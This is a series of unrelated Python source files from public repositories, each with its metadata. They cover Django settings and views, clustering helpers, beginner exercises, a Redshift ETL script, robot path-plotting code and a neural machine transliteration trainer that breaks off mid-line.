Python
false
false
3,161
py
""" Django settings for composeexample project. Generated by 'django-admin startproject' using Django 2.2.6. For more information on this file, see https://docs.djangoproject.com/en/2.2/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.2/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '@n9%e(p+y-)w2vvcg$zrojg4^$45_vfc_9szbz3&si$_*--1_9' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'composeexample.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'composeexample.wsgi.application' # Database # https://docs.djangoproject.com/en/2.2/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql', 'NAME': 'postgres', 'USER': 'postgres', 'HOST': 'db', 'PORT': 5432, } } # Password validation # https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.2/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.2/howto/static-files/ STATIC_URL = '/static/'
81bda47956fbfa77abceafabf1ba04f77f849ac0
58412bd1c5364cd88205030de06cbbdc246b677c
/jupyter_file/hierarchical_helper.py
827896481959b986e4b7f3f478195e75782344fc
[ "Apache-2.0" ]
permissive
caserwin/daily-learning-python
764c7430a8fe5dbd2a8884a6a56d075d56203070
da66c1c0309dc1052d00104b005e8dd11550613b
refs/heads/master
2022-07-29T02:29:15.860159
2022-06-21T21:23:46
2022-06-21T21:23:46
119,244,311
2
1
null
null
null
null
UTF-8
Python
false
false
4,901
py
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2019-05-15 11:14 # @Author : erwin from collections import deque import operator class TreeNode(object): def __init__(self, idx=-1, data=None, parrent_node=None): self.idx = idx self.parrent_node = parrent_node self.data = data self.left_node = None self.right_node = None def __str__(self): return '<TreeNode: idx: %s, data: %s>' % (self.idx, str(self.data)) def isLeaf(self): return not (self.left_node or self.right_node) class ClusterHelper(object): def __init__(self, linkage_tree, len): self.linkage_tree = linkage_tree self.maxnode = linkage_tree.maxnode self.len = len def toMap(self): child_left, child_right, dist, cnt = self.linkage_tree.get_linkage(self.maxnode) node_deque = deque([(self.maxnode, child_left), (self.maxnode, child_right)]) s = {} while len(node_deque) > 0: from_node, to_node = node_deque.popleft() s[to_node] = from_node if to_node >= self.len: child_left, child_right, dist, cnt = self.linkage_tree.get_linkage(to_node) node_deque.append((to_node, child_left)) node_deque.append((to_node, child_right)) return s class HierarchicalHelper(object): def __init__(self, linkage_tree): """ :param tree: linkage_tree is dtaidistance.clustering import LinkageTree """ _, _, dist, cnt = linkage_tree.get_linkage(linkage_tree.maxnode) self.root = TreeNode(idx=linkage_tree.maxnode, data=[dist, cnt]) self.linkage_tree = linkage_tree self.idx_node_map = {} self.buildTree(self.root, None, linkage_tree.maxnode) def buildTree(self, tree_node, ptree_node, idx): node_info = self.linkage_tree.get_linkage(idx) if node_info is not None: # 说明不是叶节点 child_left, child_right, dist, cnt = node_info[0], node_info[1], node_info[2], node_info[3] if tree_node is None: data = [dist, cnt] tree_node = TreeNode(idx=idx, data=data, parrent_node=ptree_node) self.idx_node_map[idx] = tree_node # 构建左边节点 tree_node.left_node = self.buildTree(tree_node.left_node, tree_node, child_left) # 构建右边节点 tree_node.right_node = self.buildTree(tree_node.right_node, tree_node, child_right) return tree_node else: # 说明是叶节点:没有左右子节点和相应的数据 tree_node = TreeNode(idx=idx, parrent_node=ptree_node) self.idx_node_map[idx] = tree_node return tree_node def iterTreePrint(self, node): if node is not None: print(node.idx) self.iterTreePrint(node.left_node) self.iterTreePrint(node.right_node) def iterTree(self, node, res_ls): if node.isLeaf(): res_ls.append(node) else: self.iterTree(node.left_node, res_ls) self.iterTree(node.right_node, res_ls) def getClusterByNum(self, tree_node, num, cluster_map): if len(cluster_map) == 0: cluster_map[tree_node] = tree_node.data[0] if num == len(cluster_map): return cluster_map.keys() else: # 每次从cluster_map 选择距离最大的节点 max_tree_node = max(cluster_map.items(), key=operator.itemgetter(1))[0] lmax_tree_node = max_tree_node.left_node rmax_tree_node = max_tree_node.right_node cluster_map.pop(max_tree_node) cluster_map[lmax_tree_node] = 0 if lmax_tree_node.isLeaf() else lmax_tree_node.data[0] cluster_map[rmax_tree_node] = 0 if rmax_tree_node.isLeaf() else rmax_tree_node.data[0] return self.getClusterByNum(tree_node, num, cluster_map) def getClusterByDist(self, tree_node, dist, cluster_map): if len(cluster_map) == 0: cluster_map[tree_node] = tree_node.data[0] min_tree_node = max(cluster_map.items(), key=operator.itemgetter(1))[0] if dist > cluster_map[min_tree_node]: return cluster_map.keys() else: # 每次从cluster_map 选择距离最大的节点 max_tree_node = max(cluster_map.items(), key=operator.itemgetter(1))[0] lmax_tree_node = max_tree_node.left_node rmax_tree_node = max_tree_node.right_node cluster_map.pop(max_tree_node) cluster_map[lmax_tree_node] = 0 if lmax_tree_node.isLeaf() else lmax_tree_node.data[0] cluster_map[rmax_tree_node] = 0 if rmax_tree_node.isLeaf() else rmax_tree_node.data[0] return self.getClusterByDist(tree_node, dist, cluster_map)
bd194fe30d0af9dac7e04d16d366e2ec158b15a3
a738e9ea0012bf4303d3ada815d188cab7b9ce2a
/Day4/while_loop2.py
d62cd0c7fa5044c81e12e18f461d631b4f79f677
[]
no_license
AzizUddin05/pythonBasic
a8efbe934286faedc6da763ca79744a326ecdb43
cc1464422a9c4402d28ea4b1b43f0cdcf0c1cac2
refs/heads/main
2023-07-12T09:45:48.176180
2021-07-31T15:39:15
2021-07-31T15:39:15
391,391,754
0
0
null
null
null
null
UTF-8
Python
false
false
61
py
i = 1 while i <= 100: print(i, end="\t") i = i + 1
fe47bf42475c493e72dca25cccc333b60767f7e2
b50bb55a909e726f9547677a72b74a3f3582730c
/qa_tools/__init__.py
e129a0a2ff502051ec372e24b613d769c3292744
[ "MIT" ]
permissive
keithgroup/qa-atoms-dimers
d3fe81bed1d76265dde73f8857fd309bc1946559
fff24f5658b45618de8f2dcb35b3b0b7e87898d0
refs/heads/main
2023-04-18T02:55:39.252076
2022-01-21T19:46:21
2022-01-21T19:46:21
421,457,242
0
0
null
null
null
null
UTF-8
Python
false
false
1,116
py
# MIT License # # Copyright (c) 2021, Alex M. Maldonado # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE.
75e7b104f4a5d12e2b43805f5b4e15811699bd54
ae8c1de8eea8e16f9f3b3b7d491fe242e7514e2e
/build/dynamixel-workbench-msgs/dynamixel_workbench_msgs/catkin_generated/pkg.installspace.context.pc.py
b83504a3c2f16a8f195b4851b97484b094bf68fd
[]
no_license
sjlazza/t3_mav_flight
5209c3de198413366106ce10afc4943b44d4c5a1
b2140d97c2ed6510d643c47fb47a365c29851859
refs/heads/master
2023-06-10T07:30:06.059231
2021-06-14T09:16:00
2021-06-14T09:16:00
374,551,237
0
0
null
null
null
null
UTF-8
Python
false
false
443
py
# generated from catkin/cmake/template/pkg.context.pc.in CATKIN_PACKAGE_PREFIX = "" PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include".split(';') if "${prefix}/include" != "" else [] PROJECT_CATKIN_DEPENDS = "std_msgs;message_runtime".replace(';', ' ') PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else [] PROJECT_NAME = "dynamixel_workbench_msgs" PROJECT_SPACE_DIR = "/home/mrl/catkin_ws/install" PROJECT_VERSION = "2.0.1"
94450c5327da7d416b41a53d69aac0436e893583
9536f2b718f489bc89c49381b77d3d05a1da3b4b
/image_anncs/urls.py
13568b0308e8d8633dd35c7d65d3afaf79f81cde
[]
no_license
Billy4195/DigitalSignage
d1b7e7e97052470d23e916135766ba6d76edd4e2
f516144f3a84f80f8260b11eb63089d2e96af5b1
refs/heads/master
2020-09-11T02:01:47.050513
2020-05-07T09:38:52
2020-05-07T09:38:52
221,904,249
1
0
null
null
null
null
UTF-8
Python
false
false
293
py
from django.contrib import admin from django.urls import path, include from django.contrib.auth.decorators import login_required from . import views urlpatterns = [ path('upload/', views.upload, name='upload'), path('delete/<int:img_id>', views.delete, name='img_delete'), ]
ce9a83b4eb122405b35d1dc0d1fedc11545b9972
6da19be45ff986768eb820f11691977cb3c84772
/Python/6_Advance_Python_development/606_Collection_module/Exercise_1.py
fe41fc148353319418877cf6d25a2e7196edf421
[]
no_license
alexp01/trainings
9e72f3a571292b79d2b1518f564d2dc0a774ef41
9d8daee16f15e0d7851fab12ab3d2505386a686c
refs/heads/master
2023-05-04T23:37:13.243691
2023-05-02T08:02:53
2023-05-02T08:02:53
272,425,687
0
0
null
null
null
null
UTF-8
Python
false
false
961
py
# https://www.udemy.com/course/the-complete-python-course/learn/quiz/4427862#questions from collections import defaultdict, OrderedDict, namedtuple, deque def task1(username: str, userlocation : str) -> defaultdict: """ - create a `defaultdict` object, and its default value would be set to the string `Unknown`. - Add an entry with key name `Alan` and its value being `Manchester`. - Return the `defaultdict` object you created. """ # you code starts here: local_variable = defaultdict(list) local_variable.default_factory = 'Unknown' local_variable[username] = userlocation return local_variable call_task1 = task1('Alan','Manchester') print(call_task1) # My code is not good # I forgot to use : (lambda: 'Unknown') in order to overwrite the default dict returned value. # Training solution: """ def task1() -> defaultdict: dd = defaultdict(lambda: 'Unknown') dd['Alan'] = 'Manchester' return dd """
9405a8fbdc0c36536291aa6381e95ba5066ed969
2ac4951d0a8c2dc8398a4718146bf57f7a336727
/chapter2/odd_list1.py
2c3eb8b75f5e089d5c3d94c55e58ba3004e35b17
[]
no_license
OldJohn86/Langtangen
5e37a469828415f7aa5ccfc17f9390af999e328a
aaa34a1779d3732c8fa84c0bb3c860f00468178c
refs/heads/master
2020-08-25T06:21:54.335805
2014-10-04T20:38:10
2014-10-04T20:38:10
null
0
0
null
null
null
null
UTF-8
Python
false
false
191
py
# odd.py prints odd numbers from 1 to n n = 20 i = 1 list = [] while i <= n: list.append(i) i = i + 2 for j in list: print j ''' python odd_list1.py 1 3 5 7 9 11 13 15 17 19 '''
582a1b621e09ebb78b94bcb5d50e555ba68e402e
dc39430cc2dd99c63efbfab9d15f190ae5c93b92
/xnb_parse/type_readers/xTile/__init__.py
7921e907added554f64aa53acc57eaae7df6613f
[ "MIT" ]
permissive
parhelia512/xnb_parse
f0cd9280c034d12d3e4ae31eef8a8e4a2f48a053
923cdce34203317c1e081dd56a171ae84d754b7c
refs/heads/master
2020-05-29T11:50:36.466784
2017-03-27T11:07:25
2017-03-27T11:07:25
29,853,018
0
1
null
2017-03-27T11:07:26
2015-01-26T08:58:19
Python
UTF-8
Python
false
false
155
py
""" xTile type readers! """ from __future__ import print_function from xnb_parse.type_readers.xTile import xTile_graphics __all__ = ['xTile_graphics']
0d9d0cb061a679f2682422a87b81894348f4e3a8
61347b3363a6818ca6b19b323aee041f6c68da55
/ecommerce/shop/migrations/0006_auto_20210228_1035.py
4d900e033c5f59c717c48f705db0750e6d203454
[]
no_license
gianniskokkosis/django_ecommerce
a53885119f609ac599aeae0fc830e902e491e50c
b0719a19225c4f44c290d92f21e4109a57599405
refs/heads/main
2023-03-18T22:36:43.406078
2021-03-11T16:09:29
2021-03-11T16:09:29
303,303,860
0
0
null
null
null
null
UTF-8
Python
false
false
666
py
# Generated by Django 3.1.6 on 2021-02-28 08:35 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('shop', '0005_remove_cart_status'), ] operations = [ migrations.CreateModel( name='Wishlist', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='shop.product')), ], ), migrations.DeleteModel( name='Cart', ), ]
db1a882960a19c51a5976829f37073ea7d82c24c
e41d8daac285e37551e17778fa1d31698d707311
/Project3/etl.py
28d9b6cd4d800d5bcddb569a5d07071bfd69d1ed
[]
no_license
Johannes-Handloser/Data-Engineer-Nanodegree
d0224011b28ce1fdd9d9cc9b037032216cffc39a
5da2123c5b0eff436ff570281be6ed3161d95c2a
refs/heads/master
2022-11-26T19:47:31.795613
2020-08-08T10:34:53
2020-08-08T10:34:53
271,854,680
0
0
null
null
null
null
UTF-8
Python
false
false
1,269
py
import configparser import psycopg2 from sql_queries import copy_table_queries, insert_table_queries def load_staging_tables(cur, conn): """ Load data from S3 to the previously created staging tables using the queries in the copy_table_queries array """ print("inside load staging tables") for query in copy_table_queries: cur.execute(query) conn.commit() def insert_tables(cur, conn): """ ETL Function for populating dimension and fact tables from the staging tables using insert_table_queries array """ print("inside insert to tables with queries:") for query in insert_table_queries: print("query: " + query) cur.execute(query) conn.commit() def main(): """ Main function to create database connection to AWS Redshift and executing etl functions """ config = configparser.ConfigParser() config.read('dwh.cfg') try: conn=psycopg2.connect("host={} dbname={} user={} password={} port={}".format(*config['CLUSTER'].values())) except: print ("I am unable to connect to the database.") cur = conn.cursor() load_staging_tables(cur, conn) insert_tables(cur, conn) conn.close() if __name__ == "__main__": main()
7f687d32f8e6e619adc652e3a374840a15d548fc
720ec1a86771c996b7ed7bb2720f44b90789b599
/draw.py
72cafabcdb8e5d951c824549ffc1b5b647db8f1d
[]
no_license
wangqiaoli/DynamicalEnvs
6abfc821237034ff9a4eca50b0789d8d2ff7eaa4
c522cbee1096ddfa8473b358781c2fde4ae1cbd1
refs/heads/master
2022-12-09T09:23:40.360941
2020-09-21T02:22:26
2020-09-21T02:22:26
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,111
py
#!/usr/bin/env python # -*-coding:utf-8 -*- ''' @author: daishilong @contact: [email protected] ''' import numpy as np import matplotlib.pyplot as plt import matplotlib.patches as patches import matplotlib.animation as anim from rigid import RectObs, RectRobot, CircleRobot def plot_arrow(ax, x, y, yaw, length=0.5, width=0.5, color='k'): arrow = ax.arrow(x, y, length * np.cos(yaw), length * np.sin(yaw), width=0.1, head_width=0.4, fc=color, ec=color) return [arrow] def plot_robot(ax, rigidrobot, pose): rigidrobot.pose = pose[:3] outline = rigidrobot.outline() plot_outline, = plt.plot(outline[:,0], outline[:,1], c=rigidrobot.color) return [plot_outline] def plot_rectobs(ax, obs): rect = patches.Rectangle(obs.rect[0], *(obs.rect[1]-obs.rect[0]), color=obs.color) return ax.add_patch(rect) def plot_obs_list(ax, obs_list): collection = [] for obs in obs_list: if isinstance(obs, RectObs): collection.append(plot_rectobs(ax, obs)) return collection def plot_problem_definition(ax, obs_list, rigidrobot, start, goal): """ plot the obstacles, start and goal Parameters ---------- ax: figure axis obs_list: array_like list of obstacles obs_size: float obstacle size start: array_like start state goal: array_like goal state Return ------ collection: list a collection of matplotlib artists """ collection = [] ax_ob = plot_obs_list(ax, obs_list) start_mark = plot_arrow(ax, *start[:3], color='k') goal_mark = plot_arrow(ax, *goal[:3], color='b') collection += ax_ob + start_mark + goal_mark return collection def draw_tree(robot_env, start, goal, tree, vertex=True, save_gif=True, fname='rrt_tree'): """Draw the tree built by the planner Args: robot_env (rl_planner.env.base_env.BaseEnv): the robot gym env start (numpy.ndarray) goal (numpy.ndarray) tree (list): list of nodes vertex (bool): nodes will be plotted if vertex is True fname (str) """ fig, ax = plt.subplots(figsize=(6,6)) plt.axis([-22,22,-22,22]) plt.xticks([]) plt.yticks([]) collection_list = [] # each entry is a collection tmp = plot_problem_definition(ax, robot_env.obs_list, robot_env.rigid_robot, start, goal) collection_list.append(tmp) for node in tree: if node.parent: tmp = tmp.copy() path = np.array(node.path[:]) ax_path, = plt.plot(path[:,0], path[:,1], "-g", linewidth=0.6) tmp.append(ax_path) if vertex: ax_node, = plt.plot(node.state[0], node.state[1], 'x', c='black', markersize=1.0) tmp.append(ax_node) collection_list.append(tmp) # plt.pause(2) plt.savefig(fname+'.png') # plt.show() gif = anim.ArtistAnimation(fig, collection_list, interval=50) if save_gif: gif.save(fname+'.gif', writer = anim.PillowWriter(fps=4)) def draw_path(robot_env, start, goal, path, fname='rrt_path'): """Draw the planned path. Args: robot_env (rl_planner.env.base_env.BaseEnv): the robot gym env start (numpy.ndarray) goal (numpy.ndarray) path (list): the planned path fname (str) """ fig, ax = plt.subplots(figsize=(6,6)) plt.axis([-22,22,-22,22]) plt.xticks([]) plt.yticks([]) collection_list = [] # each entry is a collection tmp = plot_problem_definition(ax, robot_env.obs_list, robot_env.rigid_robot, start, goal) array_path = np.array([state[:2] for state in path]) plt.plot(array_path[:,0], array_path[:,1], c='k', linewidth=1.0) collection_list.append(tmp) for state in path: tmp_ = tmp.copy() robot_marker = plot_robot(ax, robot_env.rigid_robot, state[:3]) tmp_ += robot_marker collection_list.append(tmp_) gif = anim.ArtistAnimation(fig, collection_list, interval=200) gif.save(fname+'.gif', writer = anim.PillowWriter(fps=5))
c359c8d6b63998a8228d8333a383d55100661cfa
6a81b9bc6c4a1b3296b5b7535f12ceb30c461604
/phasing/attachAB.py
7d8903478abcf68e1b2fa4bd7400fc7c87d3e38e
[]
no_license
ac812/mega-analysis
71a0744ba72596eac210d3abdbb014904839f608
a155c655d1f4af64233729d822e8debba7eaf954
refs/heads/master
2021-01-17T08:29:54.718241
2011-12-15T20:54:44
2011-12-15T20:54:44
null
0
0
null
null
null
null
UTF-8
Python
false
false
240
py
import sys for l in sys.stdin: toksA = l.rstrip().split("\t") toksB = l.rstrip().split("\t") toksA[0] += "_A" toksA[1] += "_A" toksB[0] += "_B" toksB[1] += "_B" print "\t".join(toksA) print "\t".join(toksB)
cb60e16707f3be241ffe2d78c697d1dd43a6d1a9
1892bf56c2eda7d340c841235081a4ec928fd62e
/748. Shortest Completing Word.py
a73dc307b40b69cfc7da6fab5187fcaa9b06dcbe
[]
no_license
WindChimeRan/leetcode-codewars
bd736156b53201b0219a36ea35bcb81b599d0486
9f2fca7fc3926a5c18c95bb49dcecfc7900b681c
refs/heads/master
2021-07-07T11:11:19.988988
2020-07-28T03:32:22
2020-07-28T03:32:22
163,526,082
0
0
null
null
null
null
UTF-8
Python
false
false
793
py
# 1 class Solution: def shortestCompletingWord(self, licensePlate, words): """ :type licensePlate: str :type words: List[str] :rtype: str """ plate = sorted(map(str.lower, filter(lambda x: str.isalpha(x), licensePlate))) result = None length = 1001 for w in words: inword = sorted(filter(lambda x: x in plate, w)) state = [] for p in plate: if p in inword: state.append(True) inword.remove(p) else: state.append(False) if all(state): if len(w) < length: result = w length = len(w) return result
a5f25257cbca5020bcd61522aa7920ae66fee4a8
0fcc2db432b667872a85a80d77e1e71925f4b441
/autonpa/autotests/actions.py
9310f1d1394ef80febffbd8945670e350404cb82
[ "Apache-2.0" ]
permissive
Jockero1991/Autonpa
e830b85160ffc251108f8ce310bfe629982390f9
dd90baf2b6b5c66535672973b98b0c90d0d65d51
refs/heads/master
2022-12-17T13:02:57.635702
2021-03-30T06:37:28
2021-03-30T06:37:28
124,958,867
0
1
Apache-2.0
2022-12-08T00:57:36
2018-03-12T22:22:38
Python
UTF-8
Python
false
false
908
py
import postgresql as ps from selenium import webdriver as wd from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.chrome.options import Options from selenium.webdriver.common.desired_capabilities import DesiredCapabilities chrome_options = Options() chrome_options.add_argument("--window-size=1920,1080") caps=DesiredCapabilities.CHROME caps['loggingPrefs']={'browser': 'ALL'} # ввести текст по переданному селектору # раскрыть выпадающий список, выбрать значение # нажать кнопку по переданному селектору # ввести текст и выбрать значение # Получить текст элемента по переданному селектору
69203dd0d18666e3761e7f7baee12259aa9dd614
40bfe140480d42750aa4a28fa07c2d25c6c51891
/apps/api/views.py
6edf3a613b0fc6504611d79efb3d2c74622b8bcf
[]
no_license
kuzentio/mitra
bed5750a1f34bbfeab48aaaa1ca6907b0a04abd8
f1da84ca5657c8741141cff145487fa6e29b5cfe
refs/heads/master
2023-04-11T07:16:11.978486
2019-03-19T16:22:57
2019-03-19T16:22:57
135,567,211
0
1
null
2021-03-01T15:49:57
2018-05-31T10:09:35
Python
UTF-8
Python
false
false
6,965
py
from datetime import datetime from django.contrib.auth.decorators import login_required from django.http import JsonResponse from rest_framework import generics, status from rest_framework.decorators import api_view from rest_framework.generics import get_object_or_404 from rest_framework.permissions import IsAuthenticated from rest_framework.response import Response from apps.api.serializers import OrderSerializer, StrategyCreateSerializer, AccountCreateSerializer from apps.order import utils from apps.order import constants from apps.order.models import Order from apps.strategy.models import Strategy class APIOrderView(generics.ListAPIView): queryset = Order.objects.all() serializer_class = OrderSerializer permission_classes = (IsAuthenticated,) def get_queryset(self): extra_query = {} qs = super(APIOrderView, self).get_queryset() closed_at_range = [ constants.DEFAULT_MIN_DATE, constants.DEFAULT_MAX_DATE, ] if self.request.query_params.get('pair') == 'All': self.request.GET._mutable = True self.request.query_params.pop('pair') if self.request.query_params.get('min_date'): min_date = datetime.strptime( self.request.query_params.get('min_date'), '%d.%m.%Y' ) closed_at_range[0] = min_date if self.request.query_params.get('max_date'): max_date = datetime.strptime( self.request.query_params.get('max_date'), '%d.%m.%Y' ) closed_at_range[1] = max_date extra_query['closed_at__range'] = closed_at_range extra_query['pair__icontains'] = self.request.query_params.get('pair', '') exchange = self.kwargs.get('exchange_name') if exchange is not None: extra_query['exchange__name'] = exchange return qs.filter(**extra_query) def finalize_response(self, request, response, *args, **kwargs): response = super(APIOrderView, self).finalize_response(request, response) if self.get_queryset().exists(): pnl = utils.get_orders_pnl(self.get_queryset().all()) response.data.update(pnl) response.data.update( {'pairs': list(self.get_queryset().all().values_list('pair', flat=True).distinct())} ) return response class BaseAPIStrategyCreateView(generics.CreateAPIView): serializer_class = StrategyCreateSerializer permission_classes = (IsAuthenticated,) def create(self, request, *args, **kwargs): serializer = self.serializer_class(data=self.get_serializer_context()) if serializer.is_valid(): serializer.save() headers = self.get_success_headers(serializer.data) return Response({'success': True, 'data': serializer.data}, status=status.HTTP_201_CREATED, headers=headers) response_data = serializer.data response_data['errors'] = serializer.errors response_data['success'] = False return Response(response_data, status=status.HTTP_200_OK) class APIStrategyCreateView(BaseAPIStrategyCreateView): serializer_class = StrategyCreateSerializer permission_classes = (IsAuthenticated,) def get_serializer_context(self): request_data = dict(self.request.data) strategies = Strategy.objects.order_by('-port') data = { 'data': dict( zip(request_data.get('key'), request_data.get('value')) ), 'user': self.request.user.id, 'port': strategies.last().port + 1 if strategies.exists() else 7000 } return data class APIAccountCreateView(BaseAPIStrategyCreateView): serializer_class = AccountCreateSerializer permission_classes = (IsAuthenticated,) def get_serializer_context(self): request_data = self.request.data.dict() data = { 'exchange': request_data.get('exchange'), 'api_key': request_data.get('api_key'), 'api_secret': request_data.get('api_secret'), 'user': self.request.user.id } return data @login_required @api_view(["POST"]) def strategy_set_value_view(request, strategy_uuid): strategy = get_object_or_404(Strategy.objects.filter( uuid=strategy_uuid, user=request.user )) key = request.POST.get('key', '') value = request.POST.get('value', '') strategy.set_value(key, value) return JsonResponse({'success': True, 'data': strategy.data}) @login_required @api_view(["POST"]) def strategy_delete_key_view(request, strategy_uuid): strategy = get_object_or_404(Strategy.objects.filter( uuid=strategy_uuid, user=request.user )) key = request.POST.get('key') strategy.delete_key(key) return JsonResponse({'success': True, 'data': strategy.data}) @login_required @api_view(["POST"]) def strategy_delete_view(request, strategy_uuid): strategy = get_object_or_404(Strategy.objects.filter( uuid=strategy_uuid, user=request.user )) strategy.is_deleted = True strategy.save() return JsonResponse({'success': True}) @login_required @api_view(["POST"]) def start_strategy_view(request, strategy_uuid): strategy = get_object_or_404(Strategy.objects.filter( uuid=strategy_uuid, user=request.user )) result = strategy.up_container() if result: return JsonResponse({'success': True}) return JsonResponse({'success': False, 'message': 'Bot could not been initialized, maybe it already exists.'}) @login_required @api_view(["POST"]) def down_strategy_view(request, strategy_uuid): strategy = get_object_or_404(Strategy.objects.filter( uuid=strategy_uuid, user=request.user )) strategy.down_container() return JsonResponse({'success': True}) @login_required @api_view(["POST"]) def close_orders_view(request, strategy_uuid): strategy = get_object_or_404(Strategy.objects.filter( uuid=strategy_uuid, user=request.user )) strategy.close_all_orders() return JsonResponse({'success': True}) @login_required @api_view(["POST"]) def get_orders_view(request, strategy_uuid): strategy = get_object_or_404(Strategy.objects.filter( uuid=strategy_uuid, user=request.user )) strategy.get_orders() return JsonResponse({'success': True}) @login_required @api_view(["POST"]) def get_history_view(request, strategy_uuid): strategy = get_object_or_404(Strategy.objects.filter( uuid=strategy_uuid, user=request.user )) strategy.close_all_orders() return JsonResponse({'success': True}) def sell_all_view(request, strategy_uuid): strategy = get_object_or_404(Strategy.objects.filter( uuid=strategy_uuid, user=request.user )) strategy.sell_all() return JsonResponse({'success': True})
2d5e1ef3de847984b2241c0129fbfc933c8e72fd
e5f04e20a7c9a01f6cf9a9827203de62e4c4b66e
/mnmt/trainer/trainer.py
047f9c1b3d12c3126e03717d7675d250e33efc59
[ "MIT" ]
permissive
syizhao/Multi-task-NMTransliteration
e2284a1212d68ac894ac4f78848b11fc1ec85b1d
d8e6a957f3d6e870172f6aa92e9871769d863244
refs/heads/master
2023-02-14T01:21:42.790144
2021-01-09T22:16:24
2021-01-09T22:16:24
null
0
0
null
null
null
null
UTF-8
Python
false
false
25,080
py
from mnmt.inputter import ArgsFeeder from mnmt.inputter import generate_batch_iterators from mnmt.translator import Seq2SeqTranslator from mnmt.alternating_character_table import AlternatingCharacterTable from mnmt.alternating_character_table import dict_act_path from mnmt.trainer.utils import * import torch import torch.nn as nn import torch.optim as optim import math import time import pandas as pd class Trainer: data_container: DataContainer def __init__(self, args_feeder: ArgsFeeder, model): """ Args: args_feeder (ArgsFeeder): model: the NMT model """ self.args_feeder = args_feeder # init train.log self.train_log_path = "experiments/exp{}/train.log".format(self.args_feeder.exp_num) # init model self.model = model log_print(self.train_log_path, model.apply(init_weights)) self.num_params = count_parameters(self.model) self.optimizer = getattr(optim, args_feeder.optim_choice)(model.parameters(), lr=args_feeder.learning_rate) # learning rate scheduler if args_feeder.valid_criterion == 'ACC': self.decay_mode = 'max' # decay when less than maximum elif args_feeder.valid_criterion == 'LOSS': self.decay_mode = 'min' # decay when more than minimum self.scheduler = optim.lr_scheduler.ReduceLROnPlateau( optimizer=self.optimizer, mode=self.decay_mode, factor=args_feeder.lr_decay_factor, # 0.9 in paper patience=args_feeder.decay_patience) # evaluation memory bank class EvalMemoryBank: def __init__(self, best_valid_loss=float('inf'), acc_valid_loss=float('inf'), best_valid_acc=float(-1), best_valid_epoch=float(-1), best_train_step=float(-1), early_stopping_patience=args_feeder.early_stopping_patience, best_valid_loss_aux=float('inf'), best_valid_acc_aux=float(-1)): self.best_valid_loss = best_valid_loss self.acc_valid_loss = acc_valid_loss self.best_valid_acc = best_valid_acc self.best_valid_epoch = best_valid_epoch self.best_train_step = best_train_step self.early_stopping_patience = early_stopping_patience self.best_valid_loss_aux = best_valid_loss_aux self.best_valid_acc_aux = best_valid_acc_aux self.eval_memory_bank = EvalMemoryBank() # to recover full patience when improving self.early_stopping_patience = args_feeder.early_stopping_patience # training memory bank class TrainMemoryBank: def __init__(self, exp_num=args_feeder.exp_num, total_epochs=args_feeder.total_epochs, n_epoch=0, n_steps=0, report_interval=args_feeder.report_interval): self.exp_num = exp_num self.total_epochs = total_epochs self.n_epoch = n_epoch self.n_steps = n_steps self.report_interval = report_interval self.train_memory_bank = TrainMemoryBank() # single or multi task self.multi_task_ratio = 